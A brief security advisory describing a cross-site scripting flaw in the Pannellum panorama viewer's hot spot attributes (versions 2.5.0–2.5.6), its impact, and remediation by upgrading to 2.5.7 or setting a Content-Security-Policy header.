Pannellum Hot Spot Attribute XSS Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Pannellum, a web-based panorama viewer, affecting versions 2.5.0 through 2.5.6. The issue arises from the hot spot attributes configuration property, which allowed the inclusion of any attribute, including HTML event handler attributes. This vulnerability impacts websites using the standalone viewer HTML file or untrusted JSON config files, bypassing the 'escapeHTML' protection. Certain events can trigger the vulnerability without user interaction, enabling the execution of arbitrary JavaScript that could manipulate page content to appear as if it originated from the hosting website.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where an attacker can execute arbitrary JavaScript in the context of the victim's browser. This could be used to manipulate web page content or steal information such as cookies.

Remediation

Users can upgrade to Pannellum version 2.5.7, where this vulnerability has been fixed. As a workaround, the 'Content-Security-Policy' header can be set to 'script-src-attr 'none'' to block the execution of inline event handlers. Additionally, Pannellum should not be hosted on a domain that shares cookies with user authentication to reduce XSS risks.